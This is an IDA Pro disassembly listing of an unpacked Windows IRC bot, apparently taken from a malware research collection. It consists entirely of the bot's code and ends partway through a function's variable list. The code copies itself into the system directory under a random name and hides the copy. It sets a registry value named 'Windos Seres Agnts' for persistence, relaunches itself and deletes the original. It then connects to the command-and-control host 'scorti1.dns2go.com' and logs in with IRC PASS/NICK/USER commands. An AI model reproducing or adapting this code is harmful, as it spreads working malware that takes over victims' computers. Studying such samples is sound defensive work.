;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : E8D2BBA91744BC7F3E55DA154F9F4757
; File Name : u:\work\e8d2bba91744bc7f3e55da154f9f4757_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00025B34 ( 154420.)
; Section size in file : 00025B34 ( 154420.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401000(char *Str)
sub_401000 proc near ; CODE XREF: WinMain(x,x,x,x)+358�p
; sub_4188A6+1E�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_429050
xor esi, esi
mov ebx, offset aWindosSeresAgn ; "Windos Seres Agnts"
loc_401013: ; CODE XREF: sub_401000+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call dword_4CB988 ; RegCreateKeyExA
cmp [ebp+Str], esi
jz short loc_40104D
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push 1
push esi
push ebx
push [ebp+var_4]
call dword_4CB9F8 ; RegSetValueExA
jmp short loc_401057
; ---------------------------------------------------------------------------
loc_40104D: ; CODE XREF: sub_401000+2F�j
push ebx
push [ebp+var_4]
call dword_4CB938 ; RegDeleteValueA
loc_401057: ; CODE XREF: sub_401000+4B�j
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
add edi, 8
cmp edi, offset aRb ; "rb"
jb short loc_401013
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401070 proc near ; CODE XREF: sub_4010AB+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_4010A5
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_401089: ; CODE XREF: sub_401070+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_427220[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_401089
pop edi
pop ebx
loc_4010A5: ; CODE XREF: sub_401070+E�j
mov eax, esi
pop esi
not eax
retn
sub_401070 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4010AB(char *Filename)
sub_4010AB proc near ; CODE XREF: sub_4167A0+24A�p
var_10 = dword ptr -10h
Filename = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx ; Mode
call _malloc
mov [esp+10h+var_10], offset aRb ; "rb"
push [esp+10h+Filename] ; Filename
mov esi, eax
call _fopen
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4010FA
loc_4010D0: ; CODE XREF: sub_4010AB+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_4010FE
inc ebx
push ebx ; Size
push esi ; Src
call sub_41BBE2
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4010FA
push edi ; File
push 1 ; Count
lea eax, [esi+ebx-1]
push 1 ; ElementSize
push eax ; DstBuf
call _fread
add esp, 10h
jmp short loc_4010D0
; ---------------------------------------------------------------------------
loc_4010FA: ; CODE XREF: sub_4010AB+23�j
; sub_4010AB+39�j
xor eax, eax
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_4010FE: ; CODE XREF: sub_4010AB+29�j
dec ebx
push ebx
push esi
call sub_401070
push esi
mov ebx, eax
call sub_41BA91
push edi ; File
call _fclose
add esp, 10h
mov eax, ebx
loc_401119: ; CODE XREF: sub_4010AB+51�j
pop edi
pop esi
pop ebx
retn
sub_4010AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40111D proc near ; DATA XREF: WinMain(x,x,x,x)+14�o
var_268 = dword ptr -268h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
Dst = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_43E91C
call dword_4CBA6C ; closesocket
call sub_40B583
call dword_4CB92C ; WSACleanup
call dword_4CB92C ; WSACleanup
mov ebx, ds:dword_427080
push 64h
call ebx ; Sleep
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_54]
pop esi
push esi ; Size
push edi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_43DB88
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_42707C ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:dword_427078 ; GetModuleFileNameA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_427074 ; CreateProcessA
test eax, eax
jz short loc_4011E2
push 64h
call ebx ; Sleep
push [ebp+Dst]
mov esi, ds:dword_427070
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_4011E2: ; CODE XREF: sub_40111D+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_43DB80
mov eax, [esp+268h+var_268]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_42706C ; ExitProcess
pop edi
pop esi
pop ebx
loc_401205: ; DATA XREF: .data:00429004�o
jmp $+5
push 0FFFFh
push 539h
call sub_418BD1
pop ecx
mov dword_4CB710, eax
pop ecx
retn
sub_40111D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+C9�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
Filename = byte ptr -6F4h
Str = byte ptr -5F4h
Ext = byte ptr -4F0h
SubStr = byte ptr -3F0h
FullPath = byte ptr -2ECh
Dest = byte ptr -1E8h
var_E4 = dword ptr -0E4h
var_D8 = dword ptr -0D8h
var_B8 = dword ptr -0B8h
var_B4 = word ptr -0B4h
Source = byte ptr -0A0h
Dst = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset sub_40111D
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_4270B0
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4CB714, eax
call esi ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_409909
push 2
call dword_4CBA80 ; SetErrorMode
push 7530h
push offset aSbrti ; "sbrti"
push ebx
push ebx
call ds:dword_4270AC ; CreateMutexA
push eax
call ds:dword_4270A8 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_4012A1
push 1
call ds:dword_42706C ; ExitProcess
loc_4012A1: ; CODE XREF: WinMain(x,x,x,x)+76�j
lea eax, [ebp+var_884]
push eax
push 202h
call dword_4CB944 ; WSAStartup
cmp eax, ebx
jnz loc_4017E4
cmp [ebp+var_884], 2
jnz loc_4017DE
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_4017DE
mov esi, 104h
lea eax, [ebp+SubStr]
push esi
push eax
call ds:dword_42707C ; GetSystemDirectoryA
lea eax, [ebp+FullPath]
push esi
push eax
push ebx
call ds:dword_4270A4 ; GetModuleHandleA
push eax
call ds:dword_427078 ; GetModuleFileNameA
lea eax, [ebp+Ext]
push eax ; Ext
lea eax, [ebp+Filename]
push eax ; Filename
push ebx ; Dir
lea eax, [ebp+FullPath]
push ebx ; Drive
push eax ; FullPath
call __splitpath
add esp, 14h
lea eax, [ebp+Ext]
push eax
lea eax, [ebp+Filename]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
lea eax, [ebp+FullPath]
push eax ; Str
call _strstr
add esp, 1Ch
test eax, eax
jnz loc_401516
cmp dword_42908C, ebx
mov esi, offset Str ; "fgezpzzi.exe"
jz short loc_40139C
push esi ; Str
xor edi, edi
call _strlen
sub eax, 4
pop ecx
jz short loc_40139C
loc_401379: ; CODE XREF: WinMain(x,x,x,x)+179�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
push esi ; Str
add dl, 61h
mov byte ptr Str[edi], dl ; "fgezpzzi.exe"
inc edi
call _strlen
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_401379
loc_40139C: ; CODE XREF: WinMain(x,x,x,x)+148�j
; WinMain(x,x,x,x)+156�j
lea eax, [ebp+SubStr]
push esi
push eax
lea eax, [ebp+Dest]
push offset Format ; "%s\\%s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
call ds:dword_4270A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4013DC
lea eax, [ebp+Dest]
push 80h
push eax
call ds:dword_42709C ; SetFileAttributesA
loc_4013DC: ; CODE XREF: WinMain(x,x,x,x)+1A7�j
mov esi, ds:dword_427098
lea eax, [ebp+Dest]
push ebx
push eax
lea eax, [ebp+FullPath]
xor edi, edi
push eax
loc_4013F3: ; CODE XREF: WinMain(x,x,x,x)+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_40142C
call ds:dword_427094 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40142C
cmp eax, 20h
jz short loc_40140D
cmp eax, 5
jnz short loc_40142C
loc_40140D: ; CODE XREF: WinMain(x,x,x,x)+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_427080 ; Sleep
lea eax, [ebp+Dest]
push ebx
push eax
lea eax, [ebp+FullPath]
push eax
jmp short loc_4013F3
; ---------------------------------------------------------------------------
loc_40142C: ; CODE XREF: WinMain(x,x,x,x)+1D6�j
; WinMain(x,x,x,x)+1E0�j ...
lea eax, [ebp+Dest]
push eax
call sub_4187E0
pop ecx
lea eax, [ebp+Dest]
push 7
push eax
call ds:dword_42709C ; SetFileAttributesA
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_E4]
pop esi
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_E4], esi
mov [ebp+var_D8], offset byte_43DB88
mov [ebp+var_B4], bx
push 1
pop esi
mov [ebp+var_B8], esi
call ds:dword_427090 ; GetCurrentProcessId
push eax
push esi
push 100000h
loc_401495: ; DATA XREF: .data:off_433094�o
call ds:dword_42708C ; OpenProcess
lea ecx, [ebp+FullPath]
push ecx
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_988]
push offset aSDS ; "%s %d \"%s\""
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_E4]
push eax
lea eax, [ebp+SubStr]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+Dest]
push eax
call ds:dword_427074 ; CreateProcessA
test eax, eax
jz short loc_401516
push 0C8h
call ds:dword_427080 ; Sleep
push [ebp+Dst]
mov esi, ds:dword_427070
call esi ; CloseHandle
push [ebp+var_1C]
call esi ; CloseHandle
call dword_4CB92C ; WSACleanup
push ebx
call ds:dword_42706C ; ExitProcess
loc_401516: ; CODE XREF: WinMain(x,x,x,x)+137�j
; WinMain(x,x,x,x)+2CB�j
cmp dword_4DBDF8, 2
jle short loc_401562
mov eax, dword_4DBDFC
push dword ptr [eax+4] ; Str
call _atoi
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_4270A8 ; WaitForSingleObject
push esi
call ds:dword_427070 ; CloseHandle
mov eax, dword_4DBDFC
cmp [eax+8], ebx
jz short loc_401562
push 7D0h
call ds:dword_427080 ; Sleep
mov eax, dword_4DBDFC
push dword ptr [eax+8]
call ds:dword_427088 ; DeleteFileA
loc_401562: ; CODE XREF: WinMain(x,x,x,x)+2FC�j
; WinMain(x,x,x,x)+326�j
cmp dword_429090, ebx
jz short loc_40157F
cmp dword_4CBAA4, ebx
jnz short loc_40157F
lea eax, [ebp+Str]
push eax ; Str
call sub_401000
pop ecx
loc_40157F: ; CODE XREF: WinMain(x,x,x,x)+347�j
; WinMain(x,x,x,x)+34F�j
lea eax, [ebp+Source]
push offset asc_429A98 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push ebx ; int
push eax ; Source
call sub_40B3BA
lea eax, [ebp+Source]
push eax
call sub_415D38
push 0B80h ; Size
push ebx ; Val
push offset dword_43DB90 ; Dst
call _memset
add esp, 24h
lea eax, [ebp+Source]
push offset asc_429A74 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 1 ; int
push eax ; Source
call sub_40B3BA
add esp, 14h
mov esi, eax
mov edi, ds:dword_427084
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_419F4D
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E924[esi], eax
jnz short loc_401622
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_429A34 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_401622: ; CODE XREF: WinMain(x,x,x,x)+3E4�j
lea eax, [ebp+Source]
push eax
call sub_415D38
push 2
call sub_40B602
pop ecx
test eax, eax
pop ecx
jnz short loc_4016A7
lea eax, [ebp+Source]
push offset asc_429A08 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 2 ; int
push eax ; Source
call sub_40B3BA
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset sub_410BFD
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E924[esi], eax
jnz short loc_40169A
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_4299D4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40169A: ; CODE XREF: WinMain(x,x,x,x)+45C�j
lea eax, [ebp+Source]
push eax
call sub_415D38
pop ecx
loc_4016A7: ; CODE XREF: WinMain(x,x,x,x)+418�j
call _rand
push 7Fh ; Count
and eax, 3
push offset Source ; "scorti1.dns2go.com"
push offset Dest ; Dest
mov dword_4CB888, eax
call _strncpy
mov eax, dword_42906C
push 3Fh ; Count
mov edi, offset byte_4CB79C
push offset aFaak ; "#FAAK#"
push edi ; Dest
mov dword_4CB86C, eax
call _strncpy
push 3Fh ; Count
mov esi, offset byte_4CB7DC
push offset aSaad_ ; "saad."
push esi ; Dest
call _strncpy
add esp, 24h
mov dword_4CB870, ebx
loc_4016FC: ; CODE XREF: WinMain(x,x,x,x)+563�j
; WinMain(x,x,x,x)+56E�j ...
mov [ebp+var_4], ebx
loc_4016FF: ; CODE XREF: WinMain(x,x,x,x)+517�j
push offset dword_4CB718
mov dword_4CB884, ebx
call sub_4017ED
cmp eax, 2
mov [ebp+var_10], eax
jz loc_4017D9
cmp dword_4CB884, ebx
jz short loc_401726
dec [ebp+var_4]
loc_401726: ; CODE XREF: WinMain(x,x,x,x)+500�j
push 0BB8h
call ds:dword_427080 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_4016FF
cmp [ebp+var_10], 2
jz loc_4017D9
cmp [ebp+var_C], ebx
jz short loc_401789
push 7Fh ; Count
push offset Source ; "scorti1.dns2go.com"
push offset Dest ; Dest
call _strncpy
mov eax, dword_42906C
push 3Fh ; Count
push offset aFaak ; "#FAAK#"
push edi ; Dest
mov dword_4CB86C, eax
call _strncpy
push 3Fh ; Count
push offset aSaad_ ; "saad."
push esi ; Dest
call _strncpy
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_4016FC
; ---------------------------------------------------------------------------
loc_401789: ; CODE XREF: WinMain(x,x,x,x)+526�j
cmp byte_4290E4, bl
jz loc_4016FC
push 7Fh ; Count
push offset byte_4290E4 ; Source
push offset Dest ; Dest
call _strncpy
mov eax, dword_429070
push 3Fh ; Count
push offset aFaak_0 ; "#FAAK#"
push edi ; Dest
mov dword_4CB86C, eax
call _strncpy
push 3Fh ; Count
push offset aSaad__0 ; "saad."
push esi ; Dest
call _strncpy
add esp, 24h
mov [ebp+var_C], 1
jmp loc_4016FC
; ---------------------------------------------------------------------------
loc_4017D9: ; CODE XREF: WinMain(x,x,x,x)+4F4�j
; WinMain(x,x,x,x)+51D�j
call sub_40B583
loc_4017DE: ; CODE XREF: WinMain(x,x,x,x)+A1�j
; WinMain(x,x,x,x)+B1�j
call dword_4CB92C ; WSACleanup
loc_4017E4: ; CODE XREF: WinMain(x,x,x,x)+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017ED proc near ; CODE XREF: WinMain(x,x,x,x)+4E9�p
; DATA XREF: sub_401ACD+654C�o
var_190 = dword ptr -190h
Args = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dest = byte ptr -2Ch
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_401812: ; CODE XREF: sub_4017ED+E6�j
; sub_4017ED+136�j ...
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_3C]
call dword_4CB9D4 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+Args]
push eax
call sub_40A8F0
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40193F
push 1Ch ; Size
lea eax, [ebp+Dest]
push 0 ; Val
push eax ; Dst
call _memset
push 0 ; Str1
lea eax, [ebp+Dest]
push dword_4290A0 ; int
push dword_42909C ; int
push eax ; Dest
call sub_40AE84
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh ; Count
add eax, offset byte_43E928
push edi ; Source
push eax ; Dest
call _strncpy
add esp, 28h
push 6
push 1
push 2
call dword_4CBA54 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_43E91C[eax], esi
lea eax, [ebp+Dst]
push eax
push esi
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4018D8
push esi
call dword_4CBA6C ; closesocket
call sub_40A919
push 7D0h
loc_4018CD: ; CODE XREF: sub_4017ED+146�j
call ds:dword_427080 ; Sleep
jmp loc_401812
; ---------------------------------------------------------------------------
loc_4018D8: ; CODE XREF: sub_4017ED+CD�j
lea eax, [ebp+Args]
push eax ; Args
push offset unk_429AD0 ; Format
call sub_415DAC
push [ebp+var_38]
lea eax, [ebp+Args]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_401955
add esp, 28h
mov edi, eax
push esi
call dword_4CBA6C ; closesocket
test edi, edi
jz loc_401812
cmp edi, 1
jnz short loc_401935
push 0DBBA0h
jmp short loc_4018CD
; ---------------------------------------------------------------------------
loc_401935: ; CODE XREF: sub_4017ED+13F�j
cmp edi, 2
jz short loc_401943
jmp loc_401812
; ---------------------------------------------------------------------------
loc_40193F: ; CODE XREF: sub_4017ED+5A�j
xor eax, eax
jmp short loc_40194F
; ---------------------------------------------------------------------------
loc_401943: ; CODE XREF: sub_4017ED+14B�j
push [ebp+var_34]
call sub_40B6D6
pop ecx
push 2
pop eax
loc_40194F: ; CODE XREF: sub_4017ED+154�j
pop edi
pop esi
leave
retn 4
sub_4017ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401955 proc near ; CODE XREF: sub_4017ED+123�p
Dst = byte ptr -1A90h
var_A90 = dword ptr -0A90h
var_2C0 = dword ptr -2C0h
var_140 = dword ptr -140h
Str = byte ptr -0A0h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A90h
call __alloca_probe
push ebx
push esi
push edi
xor ebx, ebx
push 3
mov [ebp+var_8], ebx
lea eax, [ebp+var_2C0]
pop ecx
loc_401973: ; CODE XREF: sub_401955+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_401973
cmp byte_4CB880, bl
jz short loc_40199A
push offset byte_4CB880 ; Args
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0] ; int
call sub_409823
add esp, 0Ch
loc_40199A: ; CODE XREF: sub_401955+2E�j
push [ebp+Source]
lea eax, [ebp+Dest]
push ebx ; Str1
push ebx ; int
push 2 ; int
push eax ; Dest
call sub_40AE84
add esp, 10h
push eax
lea eax, [ebp+Str]
push [ebp+Source]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401A04
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
push 1388h
call ds:dword_427080 ; Sleep
loc_4019FD: ; CODE XREF: sub_401955+D9�j
; sub_401955+153�j
xor eax, eax
loc_4019FF: ; CODE XREF: sub_401955+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401A04: ; CODE XREF: sub_401955+92�j
; sub_401955+F8�j ...
mov esi, 1000h
lea eax, [ebp+Dst]
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
test eax, eax
jle short loc_4019FD
lea eax, [ebp+var_A90]
push eax ; int
lea eax, [ebp+Dst]
push eax ; Str
call sub_4184CC
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_401A04
lea edi, [ebp+var_A90]
loc_401A55: ; CODE XREF: sub_401955+165�j
push 1
pop esi
loc_401A58: ; CODE XREF: sub_401955+144�j
push [ebp+arg_1C] ; int
lea eax, [ebp+var_8]
push esi ; File
push eax ; int
lea eax, [ebp+var_140]
push eax ; int
lea eax, [ebp+var_2C0]
push eax ; int
push [ebp+arg_18] ; int
push [ebp+Source] ; Source
push [ebp+arg_8] ; int
push [ebp+arg_4] ; int
push [ebp+arg_0] ; int
push dword ptr [edi] ; Src
call sub_401ACD
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_401A9B
push 7D0h
call ds:dword_427080 ; Sleep
jmp short loc_401A58
; ---------------------------------------------------------------------------
loc_401A9B: ; CODE XREF: sub_401955+137�j
cmp esi, 0FFFFFFFDh
jz short loc_401AC5
cmp esi, 0FFFFFFFEh
jz short loc_401AC1
cmp esi, 0FFFFFFFFh
jz loc_4019FD
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_401A55
jmp loc_401A04
; ---------------------------------------------------------------------------
loc_401AC1: ; CODE XREF: sub_401955+14E�j
push 1
jmp short loc_401AC7
; ---------------------------------------------------------------------------
loc_401AC5: ; CODE XREF: sub_401955+149�j
push 2
loc_401AC7: ; CODE XREF: sub_401955+16E�j
pop eax
jmp loc_4019FF
sub_401955 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401ACD(int Src,int,int,int,char *Source,int,int,int,int,FILE *File,int)
sub_401ACD proc near ; CODE XREF: sub_401955+12A�p
var_569C = dword ptr -569Ch
var_568C = byte ptr -568Ch
var_528C = byte ptr -528Ch
var_50FC = byte ptr -50FCh
var_4FF8 = byte ptr -4FF8h
var_4EF8 = byte ptr -4EF8h
var_4CF8 = byte ptr -4CF8h
var_4BF8 = byte ptr -4BF8h
var_4AF4 = byte ptr -4AF4h
FullPath = byte ptr -49F4h
var_48F0 = byte ptr -48F0h
Dest = byte ptr -47F0h
var_46F0 = byte ptr -46F0h
var_45F0 = dword ptr -45F0h
var_458C = byte ptr -458Ch
var_448C = byte ptr -448Ch
var_438C = byte ptr -438Ch
Str = byte ptr -428Ch
var_408C = byte ptr -408Ch
var_3F8C = dword ptr -3F8Ch
var_3F88 = byte ptr -3F88h
var_3F08 = byte ptr -3F08h
var_3E04 = byte ptr -3E04h
var_3D00 = dword ptr -3D00h
var_3CFC = dword ptr -3CFCh
var_3CF8 = dword ptr -3CF8h
var_3CF4 = dword ptr -3CF4h
var_3CF0 = dword ptr -3CF0h
var_3CEC = dword ptr -3CECh
var_3CE8 = byte ptr -3CE8h
var_3C68 = byte ptr -3C68h
var_3BE8 = byte ptr -3BE8h
var_3B68 = byte ptr -3B68h
var_3AE8 = byte ptr -3AE8h
var_3A68 = dword ptr -3A68h
var_3A64 = dword ptr -3A64h
var_3A60 = dword ptr -3A60h
var_3A5C = dword ptr -3A5Ch
var_3A58 = byte ptr -3A58h
var_37D1 = byte ptr -37D1h
var_37D0 = byte ptr -37D0h
var_36CC = dword ptr -36CCh
var_36C4 = dword ptr -36C4h
var_36C0 = dword ptr -36C0h
var_36BC = dword ptr -36BCh
var_36B8 = dword ptr -36B8h
var_36B0 = dword ptr -36B0h
var_36AC = dword ptr -36ACh
var_36A8 = byte ptr -36A8h
var_3628 = byte ptr -3628h
var_35A8 = byte ptr -35A8h
var_3528 = byte ptr -3528h
var_34A8 = dword ptr -34A8h
var_34A4 = dword ptr -34A4h
var_34A0 = dword ptr -34A0h
var_349C = dword ptr -349Ch
var_3498 = dword ptr -3498h
var_3494 = byte ptr -3494h
var_3414 = byte ptr -3414h
var_3394 = byte ptr -3394h
var_3314 = byte ptr -3314h
var_3294 = dword ptr -3294h
var_3290 = dword ptr -3290h
var_328C = dword ptr -328Ch
var_3288 = dword ptr -3288h
var_3284 = dword ptr -3284h
var_3280 = byte ptr -3280h
var_3200 = byte ptr -3200h
var_3180 = byte ptr -3180h
var_3100 = byte ptr -3100h
var_3080 = dword ptr -3080h
var_307C = dword ptr -307Ch
var_3078 = dword ptr -3078h
var_3074 = dword ptr -3074h
var_3070 = dword ptr -3070h
var_306C = byte ptr -306Ch
var_2FEC = byte ptr -2FECh
var_2F6C = byte ptr -2F6Ch
var_2EEC = byte ptr -2EECh
var_2E6C = dword ptr -2E6Ch
var_2E68 = dword ptr -2E68h
var_2E64 = dword ptr -2E64h
var_2E60 = dword ptr -2E60h
Filename = byte ptr -2E5Ch
var_2D58 = dword ptr -2D58h
var_2D54 = byte ptr -2D54h
var_2C50 = byte ptr -2C50h
var_2B4C = dword ptr -2B4Ch
var_2B48 = dword ptr -2B48h
var_2B44 = dword ptr -2B44h
var_2B40 = byte ptr -2B40h
var_2AC0 = dword ptr -2AC0h
var_2ABC = dword ptr -2ABCh
var_2AB8 = dword ptr -2AB8h
var_2AB4 = dword ptr -2AB4h
var_2AAC = byte ptr -2AACh
var_2994 = byte ptr -2994h
var_2914 = dword ptr -2914h
var_2910 = dword ptr -2910h
var_290C = dword ptr -290Ch
var_2908 = dword ptr -2908h
var_2904 = dword ptr -2904h
var_2900 = dword ptr -2900h
var_28FC = byte ptr -28FCh
var_287C = byte ptr -287Ch
var_277C = byte ptr -277Ch
var_267C = dword ptr -267Ch
